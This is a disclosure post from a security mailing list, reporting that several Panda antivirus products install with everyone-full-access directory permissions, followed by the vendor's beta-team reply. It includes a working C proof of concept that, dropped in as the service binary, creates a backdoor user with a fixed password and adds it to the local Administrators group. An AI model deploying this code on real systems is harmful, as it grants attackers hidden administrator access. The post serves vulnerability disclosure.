Re: SECURITY.NNOV: Panda Platinum Internet Security privilege escalation / bayesian filter control security vulnerabilities

Panda is realy great and realy fast. The Bug was also reported at 16.07.06 to the beta team.

-------------------- 16.07.06 --------------------

Hi there,

i think there are some badly set filesystem permissions in your software.

FileSecure 7.01.10
C:\Programme\Panda Software\AVNT everybody full access

Titanium 2006 (5.03.00)
C:\Programme\Panda Software\ everybody full access

AntiVirus 2007 (2.00.80)
C:\Programme\Panda Software\ everybody full access

Platinum Internet Security 2006 (10.02.00)
C:\Programme\Panda Software\ everybody full access

it is possible to place a binary in the directory and let it execute at startup
as an service with system privs.

example for AntiVirus 2007 (2.00.80):

build it an place it in "C:\Programme\Panda Software\Panda Antivirus 2007"
for english Windows Version Porgram Files or somethin like this.

// --- pavsrv50.c ---
#include <windows.h>
#include <stdio.h>

INT main( VOID )
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );

system( szCmdLine );

printf( "Adding user \"owner\" to the local Administrators group...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir );

system( szCmdLine );

return 0;
// --- pavsrv50.c ---

sorry for my bad english :)

testit on german windows xp sp2 all hotfixes and german windows 2k sp4 all hotfixes

btw. check the " if you install services


BTW: FileSecure 8.00.20 has the same vulnarability

I think the best solution is to change the AV Produkt.

Panda answer:
----------------- 21.07.06 -----------------------
Dear beta-tester,

Thank you very much for joining our beta program and reporting your tests so far.

We comment you that "Panda Antivirus + Firewall 2007" and "Panda Internet Security 2007" have a Shield to protect its processes and files.

All incidents and comments received will help us to build a better product.

Please, do not doubt to report us any other incident or query that you may have.

Best regards,

Beta Area
Quality Assurance Division

Panda Software
Protection against viruses, spyware, hackers, spam and other Internet threats
Buenos Aires, 12